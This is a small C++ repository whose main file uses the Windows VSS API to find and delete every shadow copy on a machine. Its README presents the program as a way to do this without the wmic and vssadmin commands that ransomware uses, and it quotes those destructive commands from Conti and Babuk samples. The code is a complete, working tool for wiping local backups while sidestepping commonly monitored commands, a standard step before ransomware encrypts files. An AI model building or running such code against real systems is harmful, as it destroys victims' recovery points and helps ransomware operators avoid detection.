├── DeleteShadowCopies
    ├── DeleteShadowCopies.vcxproj.user
    ├── DeleteShadowCopies.vcxproj.filters
    ├── DeleteShadowCopies.sln
    ├── DeleteShadowCopies.cpp
    └── DeleteShadowCopies.vcxproj
├── README.md
└── LICENSE


/DeleteShadowCopies/DeleteShadowCopies.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ### DeleteShadowCopies: Deleting Shadow Copies In Pure C++ 
 2 | 
 3 | <br>
 4 | 
 5 | ### After Looking at some of the leaked ransomware code, i noticed that (at least for the samples i've seen), that the ransomware is using wmic or vssadmin via command line to delete shadow copies, so out of curiosity i had to look for something else, and thus this repo (so im not helping ransomware authers) ...
 6 | 
 7 | 
 8 | 
 9 | ```
10 | Example:
11 |   - conti: wmic shadowcopy where "ID='{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}'" delete
12 |   - babuk: vssadmin delete shadows /all /quiet
13 | 
14 | ```
15 | 
16 | ## Demo (Creating):
17 | ![poc1](https://user-images.githubusercontent.com/111295429/198935990-45b552f9-bce7-44ae-8a91-37f50d81c760.png)
18 | 
19 | <br>
20 | 
21 | ## Demo (Deleting):
22 | ![poc2](https://user-images.githubusercontent.com/111295429/198935994-48041574-4e6b-4a99-b1e0-a6bdfc552a80.png)
23 | 
24 | <br>
25 | 
26 | ### Based On [vshadow](https://github.com/microsoft/Windows-classic-samples/blob/main/Samples/Win7Samples/winbase/vss/vshadow/shadow.cpp)
27 | 


--------------------------------------------------------------------------------
/DeleteShadowCopies/DeleteShadowCopies.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="DeleteShadowCopies.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2022 ORCA
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/DeleteShadowCopies/DeleteShadowCopies.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.1.32421.90
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DeleteShadowCopies", "DeleteShadowCopies.vcxproj", "{9012CB77-37DF-4CF1-A905-1B5B1028E1E9}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Debug|x64.Build.0 = Debug|x64
18 | 		{9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Debug|x86.Build.0 = Debug|Win32
20 | 		{9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Release|x64.ActiveCfg = Release|x64
21 | 		{9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Release|x64.Build.0 = Release|x64
22 | 		{9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Release|x86.ActiveCfg = Release|Win32
23 | 		{9012CB77-37DF-4CF1-A905-1B5B1028E1E9}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {F2464EE4-559B-46D5-887D-1787EC5B9D4A}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/DeleteShadowCopies/DeleteShadowCopies.cpp:
--------------------------------------------------------------------------------
  1 | /*
  2 | 						ORCA:@ORCx41 10/31/2022
  3 | 
  4 | 	- Program that delete shadow copies without the need of using wmic / vssadmin
  5 | 	- Tested on w10 v 10.0.19044 x64 machine
  6 | 
  7 | */
  8 | 
  9 | 
 10 | #include <Windows.h>
 11 | #include <stdio.h>
 12 | #include <vss.h>
 13 | #include <vswriter.h>
 14 | #include <vsbackup.h>
 15 | #include <vsmgmt.h>
 16 | #include <atlcomcli.h>
 17 | 
 18 | #pragma comment (lib, "VssApi.lib")
 19 | #pragma comment (lib, "ResUtils.lib")
 20 | 
 21 | 
 22 | 
 23 | 
 24 | 
 25 | #define WSTR_GUID_FMT  L"{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}"
 26 | 
 27 | #define GUID_PRINTF_ARG( X )                                \
 28 |     (X).Data1,                                              \
 29 |     (X).Data2,                                              \
 30 |     (X).Data3,                                              \
 31 |     (X).Data4[0], (X).Data4[1], (X).Data4[2], (X).Data4[3], \
 32 |     (X).Data4[4], (X).Data4[5], (X).Data4[6], (X).Data4[7]
 33 | 
 34 | 
 35 | 
 36 | 
 37 | int main() {
 38 | 
 39 | 	CComPtr<IVssBackupComponents>   m_pVssObject;
 40 | 	CComPtr<IVssEnumObject>			pIEnumSnapshots;
 41 | 	VSS_OBJECT_PROP					Prop;
 42 | 
 43 | 
 44 | 	VSS_SNAPSHOT_PROP&				Snap						= Prop.Obj.Snap;
 45 | 	HRESULT							hr							= S_OK;
 46 | 
 47 | 
 48 | 
 49 | 	hr = CoInitialize(NULL);
 50 | 	if (hr != S_OK) {
 51 | 		printf("[!] CoInitialize Failed : 0x%0.8X \n", hr);
 52 | 		return -1;
 53 | 	}
 54 | 	
 55 | 	hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_DYNAMIC_CLOAKING, NULL );
 56 | 	if (hr != S_OK) {
 57 | 		printf("[!] CoInitializeSecurity Failed : 0x%0.8X \n", hr);
 58 | 		return -1;
 59 | 	}
 60 | 
 61 | 
 62 | 	hr = CreateVssBackupComponents(&m_pVssObject);
 63 | 	if (hr == E_ACCESSDENIED){
 64 | 		printf("[!] Please Run As Admin To Delete Shadow Copies \n");
 65 | 		return -1;
 66 | 	}
 67 | 	if (hr != S_OK) {
 68 | 		printf("[!] CreateVssBackupComponents Failed : 0x%0.8X \n", hr);
 69 | 		return -1;
 70 | 	}
 71 | 
 72 | 
 73 | 	hr = m_pVssObject->InitializeForBackup();
 74 | 	if (hr != S_OK) {
 75 | 		printf("[!] InitializeForBackup Failed : 0x%0.8X \n", hr);
 76 | 		return -1;
 77 | 	}
 78 | 
 79 | 	hr = m_pVssObject->SetContext(VSS_CTX_ALL);
 80 | 	if (hr != S_OK){
 81 | 		printf("[!] SetContext Failed : 0x%0.8X \n", hr);
 82 | 		return -1;
 83 | 	}
 84 | 
 85 | 
 86 | 	hr = m_pVssObject->SetBackupState(true, true, VSS_BT_FULL, false);
 87 | 	if (hr != S_OK) {
 88 | 		printf("[!] SetBackupState Failed : 0x%0.8X \n", hr);
 89 | 		return -1;
 90 | 	}
 91 | 
 92 | 	hr = m_pVssObject->Query(GUID_NULL, VSS_OBJECT_NONE, VSS_OBJECT_SNAPSHOT, &pIEnumSnapshots);
 93 | 	if (hr == VSS_E_OBJECT_NOT_FOUND) {
 94 | 		printf("[i] There Is No Shadow Copies On This Machine \n");
 95 | 		return -1;
 96 | 	}
 97 | 
 98 | 
 99 | 
100 | 	while (TRUE){
101 | 
102 | 		ULONG ulFetched;
103 | 		hr = pIEnumSnapshots->Next(1, &Prop, &ulFetched);
104 | 		if (ulFetched == 0) {
105 | 			printf("[+] No More Shadow Copies Were Detected \n");
106 | 			break;
107 | 		}
108 | 		VssFreeSnapshotPropertiesInternal(&Snap);
109 | 
110 | 		LONG lSnapshots = 0;
111 | 		VSS_ID idNonDeletedSnapshotID = GUID_NULL;
112 | 
113 | 		wprintf(L"[i] Deleting shadow copy: " WSTR_GUID_FMT L" on %s from the provider: " WSTR_GUID_FMT L"\n",
114 | 			GUID_PRINTF_ARG(Snap.m_SnapshotId),
115 | 			Snap.m_pwszOriginalVolumeName,
116 | 			GUID_PRINTF_ARG(Snap.m_ProviderId));
117 | 
118 | 		hr = m_pVssObject->DeleteSnapshots(Snap.m_SnapshotId, VSS_OBJECT_SNAPSHOT, FALSE, &lSnapshots, &idNonDeletedSnapshotID);
119 | 		if (hr != S_OK) {
120 | 			printf("[!] DeleteSnapshots Failed: 0x%0.8X \n", hr);
121 | 		}
122 | 	}
123 | 
124 | 
125 | 	return 0;
126 | }
127 | 


--------------------------------------------------------------------------------
/DeleteShadowCopies/DeleteShadowCopies.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{9012cb77-37df-4cf1-a905-1b5b1028e1e9}</ProjectGuid>
 25 |     <RootNamespace>DeleteShadowCopies</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <PropertyGroup Label="Vcpkg">
 86 |     <VcpkgEnabled>false</VcpkgEnabled>
 87 |   </PropertyGroup>
 88 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 89 |     <ClCompile>
 90 |       <WarningLevel>Level3</WarningLevel>
 91 |       <SDLCheck>true</SDLCheck>
 92 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 93 |       <ConformanceMode>true</ConformanceMode>
 94 |       <LanguageStandard>stdcpp20</LanguageStandard>
 95 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
 96 |     </ClCompile>
 97 |     <Link>
 98 |       <SubSystem>Console</SubSystem>
 99 |       <GenerateDebugInformation>true</GenerateDebugInformation>
100 |     </Link>
101 |   </ItemDefinitionGroup>
102 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
103 |     <ClCompile>
104 |       <WarningLevel>Level3</WarningLevel>
105 |       <FunctionLevelLinking>true</FunctionLevelLinking>
106 |       <IntrinsicFunctions>true</IntrinsicFunctions>
107 |       <SDLCheck>true</SDLCheck>
108 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
109 |       <ConformanceMode>true</ConformanceMode>
110 |       <LanguageStandard>stdcpp20</LanguageStandard>
111 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
112 |     </ClCompile>
113 |     <Link>
114 |       <SubSystem>Console</SubSystem>
115 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
116 |       <OptimizeReferences>true</OptimizeReferences>
117 |       <GenerateDebugInformation>true</GenerateDebugInformation>
118 |     </Link>
119 |   </ItemDefinitionGroup>
120 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
121 |     <ClCompile>
122 |       <WarningLevel>Level3</WarningLevel>
123 |       <SDLCheck>true</SDLCheck>
124 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
125 |       <ConformanceMode>true</ConformanceMode>
126 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
127 |     </ClCompile>
128 |     <Link>
129 |       <SubSystem>Console</SubSystem>
130 |       <GenerateDebugInformation>true</GenerateDebugInformation>
131 |     </Link>
132 |   </ItemDefinitionGroup>
133 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
134 |     <ClCompile>
135 |       <WarningLevel>Level3</WarningLevel>
136 |       <FunctionLevelLinking>true</FunctionLevelLinking>
137 |       <IntrinsicFunctions>true</IntrinsicFunctions>
138 |       <SDLCheck>true</SDLCheck>
139 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
140 |       <ConformanceMode>true</ConformanceMode>
141 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
142 |     </ClCompile>
143 |     <Link>
144 |       <SubSystem>Console</SubSystem>
145 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
146 |       <OptimizeReferences>true</OptimizeReferences>
147 |       <GenerateDebugInformation>true</GenerateDebugInformation>
148 |     </Link>
149 |   </ItemDefinitionGroup>
150 |   <ItemGroup>
151 |     <ClCompile Include="DeleteShadowCopies.cpp" />
152 |   </ItemGroup>
153 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
154 |   <ImportGroup Label="ExtensionTargets">
155 |   </ImportGroup>
156 | </Project>


--------------------------------------------------------------------------------